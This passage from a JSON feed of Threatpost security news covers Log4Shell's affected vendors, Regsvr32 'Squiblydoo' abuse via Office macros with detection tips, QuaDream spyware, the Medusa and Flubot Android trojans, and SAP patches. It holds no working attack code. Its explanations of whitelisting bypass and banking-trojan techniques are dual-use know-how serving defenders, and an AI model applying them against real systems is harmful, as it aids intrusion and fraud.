[hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * [VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": "https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T22:25:28", "description": "A Windows living-off-the-land binary ([LOLBin](<https://threatpost.com/cybersecurity-failing-ransomware/175637/>)) known as Regsvr32 is seeing a [big uptick](<https://github.com/uptycslabs/IOCs/tree/main/Attacker%20increasingly%20adopting%20Squiblydoo%20technique%20via%20office%20documents>) in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.\n\nLOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending in to normal traffic patters. In this case, Regsvr32 is aMicrosoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.\n\nThis long reach is catnip to cyberattackers, who can abuse the utility via the [\u201cSquiblydoo\u201d technique](<https://car.mitre.org/analytics/CAR-2019-04-003/>), Uptycs researchers warned.\n\n\u201cThreat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,\u201d they explained in a [Wednesday writeup](<https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents>). \u201cThis method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.\u201d\n\n## **The .OCX Connection**\n\nMalicious use of Regsvr32 has been cresting of late in the Uptycs telemetry, researchers warned, with cybercrooks specifically attempting to register .OCX files in the Registry via various types of malicious Microsoft Office documents. As a class, .OCX files contain ActiveX controls, which are code blocks that Microsoft developed to enable applications to perform specific functions, such as displaying a calendar.\n\n\u201cThe Uptycs Threat Research team has observed more than 500+ malware samples using Regsvr32.exe to register [malicious] .OCX files,\u201d researchers warned. \u201cDuring our analysis of these malware samples, we have identified that some of the malware samples belonged to [Qbot](<https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-threads/158715/>) and [Lokibot](<https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/>) attempting to execute .OCX files\u202697 percent of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files.\u201d\n\nMost of the Microsoft Excel files observed in the attacks carry the .XLSM or .XLSB suffixes, they added, which are types that contain embedded macros. During the attack, these usually download or execute a malicious payload from the URL using the formulas in the macros.\n\nSimilarly, some campaigns use Microsoft Word, Rich Text Format data or Composite Document (.DOC, .DOCX or .DOCM files embedded with malicious macros, according to Uptycs.\n\n## **Identifying Suspicious regsvr32 Executions**\n\nBecause Regsvr32, like other LOLBins, is used for legitimate daily operations, its abuse often evades traditional cybersecurity defenses. However, researchers noted that security teams can monitor for a couple of specific behaviors in order to track its activity:\n\n * Look for parent/child process relationships where Regsvr32 is executed with parent process of Microsoft Word or Microsoft Excel;\n * And, it can be identified by looking for Regsvr32 executions that load the scrobj.dll, which executes a COM scriptlet.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T21:56:49", "type": "threatpost", "title": "Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T21:56:49", "id": "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "href": "https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, MacOS and WatchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. \u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Flubot, the Android spyware that\u2019s been spreading virally since last year, has hitched its infrastructure wagon up to another mobile threat known as Medusa.\n\nThat\u2019s according to ThreatFabric, which found that Medusa is now being distributed through the same SMS-phishing infrastructure as Flubot, resulting in high-volume, side-by-side campaigns.\n\nThe Flubot malware (aka Cabassous) is delivered to targets through SMS texts that prompt them to install a \u201cmissed package delivery\u201d app or a faux version of Flash Player. If a victim falls for the ruse, the malware is installed, which adds the infected device to a botnet. Then, it sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information.\n\nThe malicious implant also sends out additional text messages to the infected device\u2019s contact list, which allows it [to \u201cgo viral\u201d](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) \u2013 like the flu.\n\nApparently, Medusa likes the cut of Flubot\u2019s jib: \u201cOur threat intelligence shows that Medusa followed with exactly the same app names, package names and similar icons,\u201d ThreatFabric researchers noted in a [Monday analysis](<https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html>). \u201cIn less than a month, this distribution approach allowed Medusa to reach more than 1,500 infected devices in one botnet, masquerading as DHL.\u201d\n\nAnd that\u2019s just for one botnet. ThreatFabric pointed out that Medusa has multiple botnets carrying out multiple campaigns.\n\nUnlike Flubot, which [mainly spreads](<https://threatpost.com/flubot-spyware-android-devices/165607/>) in Europe, Medusa is more of an equal-opportunity threat when it comes to geography. Recent campaigns have targeted users from Canada, Turkey and the United States.\n\n\u201cAfter targeting Turkish financial organizations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in [a] significant number of infected devices,\u201d ThreatFabric researchers noted. \u201cPowered with multiple remote-access features, Medusa poses a critical threat to financial organizations in targeted regions.\u201d\n\n## **Medusa Bursts on the Scene**\n\nFirst discovered in July 2020, Medusa (related to the Tanglebot family of RATs) is a mobile banking trojan that can gain near-complete control over a user\u2019s device, including capabilities for keylogging, banking trojan activity, and audio and video streaming. To boot, it has received several updates and improved in its obfuscation techniques as it hops on Flubot\u2019s infrastructure coattails, researchers said.\n\nFor one, it now has an accessibility-scripting engine that allows actors to perform a set of actions on the victim\u2019s behalf, with the help of Android Accessibility Service.\n\n\u201cBy abusing Accessibility Services, Medusa is able to execute commands on any app that is running on a victim\u2019s device,\u201d researchers noted. \u201cA command like \u2018fillfocus\u2019 allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g., the beneficiary of a bank transfer.\u201d\n\nAccessibility events logging is a companion upgrade to the above. With a special command, Medusa can collect information about active windows, including the position of fields and certain elements within a user interface, any text inside those elements, and whether the field is a password field.\n\n\u201cHaving all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature,\u201d according to ThreatFabric. \u201cMoreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also [being able] to intercept some private data.\u201d\n\nThe following snippet shows the code that collects the information of active window going through its nodes:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png>)\n\nSource: ThreatFabric.\n\nFurther, in examining Medusa\u2019s back-end panels, researchers observed the malware\u2019s operators marking banking apps with a \u201cBANK\u201d tag, to control/log the input fields.\n\n\u201cThis means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list,\u201d they warned.\n\nThe command-and-control server (C2) can also command Medusa to carry out a wide variety of RAT work, including clicking on a specific UI element, sleeping, screenshotting, locking the screen, providing a list of recent apps and opening recent notifications.\n\n## **Flubot Evolves Its Capabilities**\n\nThe researchers also noticed that the addition of Medusa to the mix hasn\u2019t slowed down Flubot\u2019s own development. They explained that it now has a \u201cnovel capability never seen before in mobile banking malware.\u201d\n\nTo wit: In version 5.4, Medusa picked up the ability to abuse the \u201cNotification Direct Reply\u201d feature of Android OS, which allows the malware to directly reply to push notifications from targeted applications on a victim\u2019s device. The user isn\u2019t aware of the activity, so Flubot can thus intercept them \u2013 opening the door to thwarting two-factor authentication and more, researchers said.\n\n\u201cEvery minute the malware sends the statistics to the C2 about the notifications received,\u201d they explained. \u201cAs a response, it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing [Flubot] authors to arbitrarily change notification content\u2026We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on [a] victim\u2019s behalf, thus making notifications [a] non-reliable authentication/authorization factor on an infected device.\u201d\n\nAnother potential abuse of this functionality could be to respond to social-application interactions with \u201cnotifications\u201d containing malicious phishing links.\n\n\u201cConsidering the popularity of these type of apps and the strong focus of [Flubot] on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse,\u201d according to ThreatFabric.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:13:29", "type": "threatpost", "title": "Medusa Malware Joins Flubot's Android Distribution Network", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:13:29", "id": "THREATPOST:10245D9804511A09607265485D240FFF", "href": "https://threatpost.com/medusa-malware-flubot-android-distribution/178258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-15T20:20:39", "description": "SAP has identified 32 apps that are affected by [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 the critical vulnerability in the Apache Log4j Java-based logging library that\u2019s been [under active attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) since last week.\n\nAs of yesterday, Patch Tuesday, the German software maker reported that it\u2019s already patched 20 of those apps, and it\u2019s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in [this document](<https://support.sap.com/content/dam/support/en_us/library/ssp/my-support/trust-center/sap-tc-01-5025.pdf>), accessible to users on the company\u2019s support portal.\n\nThe news about Log4Shell has been nonstop, with the easily exploited, ubiquitous vulnerability spinning off even [more dangerous variations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), being associated with yet another [vulnerability in Apache\u2019s fast-baked patch](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) and threat actors jumping it on a [global scale](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>).\n\nBetween Sunday and Wednesday morning ET, SAP had released 50 SAP Notes and Knowledge Base entries focusing on Log4j.\n\n## **Beyond \u2018Logapalooza\u2019: Other SAP Patch Tuesday Fixes**\n\nBut hard though it may be to believe, there are other SAP security matters to attend to besidea Logapalooza, including fixes for other severe flaws in the company\u2019s products. On Tuesday, [SAP released](<https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021>) \u200b\u200b21 new and updated security patches, including four HotNews Notes and six High Priority Notes.\n\n\u201cHotNews\u201d is the highest-severity rating that SAP doles out. Three of December\u2019s HotNews-rated bugs carried a CVSS rating of 9.9 (out of 10) and the fourth hit the top mark of 10.\n\nThomas Fritsch, an SAP security researcher at enterprise security firm Onapsis, said in his SAP Patch Tuesday [writeup](<https://onapsis.com/blog/sap-security-patch-day-december-2021-patch-day-shadow-log4j>) that the number of HotNews Notes may seem high, but one of them \u2013 [#3089831](<https://launchpad.support.sap.com/#/notes/3089831>), tagged with a CVSS score of 9.9 \u2013 was initially released on SAP\u2019s September 2021 Patch Tuesday. Covering an SQL-injection vulnerability in SAP NZDT Mapping Table Framework, the note was updated in the December Patch Tuesday batch with what Fritsch said was information about possible symptoms. \u201cSAP explicitly says that the update does not require any customer action,\u201d he noted.\n\nAnother of the HotNews Notes \u2013 [#2622660](<https://launchpad.support.sap.com/#/notes/2622660>) \u2013 is rated a top criticality of 10, but it\u2019s the continuously recurring HotNews Note that provides an SAP Business Client Patch with the latest tested Chromium fixes.\n\n\u201cSAP Business Client customers already know that updates of this note always contain important fixes that must be addressed,\u201d Fritsch said. \u201cThe note references 62 Chromium fixes with a maximum CVSS score of 9.6 \u2014 26 of them rated with High Priority. The last number only reflects vulnerabilities that were reported externally, as Google doesn\u2019t provide such information about internally detected issues.\u201d\n\nTaking these out, what\u2019s left of the most critical non-Log4Shell patches are a duo for SAP Commerce that were both released with a CVSS criticality of 9.9, and which are detailed below.\n\n### SAP HotNews Note Security Note [#3109577](<https://launchpad.support.sap.com/#/notes/3109577>)\n\nThis note is for a code-execution vulnerability in SAP Commerce, localization for China, that covers 11 related CVEs. SAP has tagged it with a CVSS score of 9.9. The note patches multiple code-execution vulnerabilities in the product. Fritsch noted that the localization for China package uses the open-source library [XStream](<https://x-stream.github.io/>): a simple library that serializes objects to XML and back again.\n\nSAP\u2019s note provides a patch for version 2001 of the localization for China package, meaning that SAP Commerce customers using a lower version need to upgrade before applying the patch, Fritsch said. He pulled out two things worth mentioning when comparing the note\u2019s CVEs with the patches listed on <https://x-stream.github.io/security.html>:\n\n * The provided SAP patch contains version 1.4.15 of the XStream library\n * Version 1.4.15 specifically patches Code Execution vulnerabilities, but following the Xstream patch history, it also fixes two Denial-of-Service vulnerabilities and a Server-Site Forgery Request vulnerability\n\n\u201cAs a workaround, affected customers can also directly replace the affected XStream library file with its latest version,\u201d Fritsch advised.\n\n### SAP HotNews Note Security Note [#3119365](<https://launchpad.support.sap.com/#/notes/3119365>)\n\nThis one, which is also tagged with a CVSS score of 9.9, patches a code injection issue in a text extraction report of the Translation Tools of SAP ABAP Server & ABAP Platform.\n\nFound in Versions 701, 740, 750, 751, 752, 753, 754, 755, 756 and 804, the vulnerability allows an attacker with low privileges to execute arbitrary commands in the background, Fritsch explained. The fact that such an attacker would need at least a few privileges to exploit the vulnerability bumped its CVSS score down from 10, he said.\n\n\u201cThe provided patch just deactivates the affected coding,\u201d Fritsch continued. \u201cThe report is only used by SAP internally, was not intended for release, and does not impact existing functionality.\u201d\n\nThose who can access the note and who are interested in which report is affected can get that information in the \u201cCorrection Instructions\u201d section by activating the tab \u201cTADIR Entries,\u201d Fritsch said.\n\n## Notable SAP High Priority Notes\n\n### SAP Security Notes [#3114134](<https://launchpad.support.sap.com/#/notes/3114134>) and [#3113593](<https://launchpad.support.sap.com/#/notes/3113593>)\n\nSAP Commerce is also affected by these two notable High Priority notes.\n\nTagged with a CVSS score of 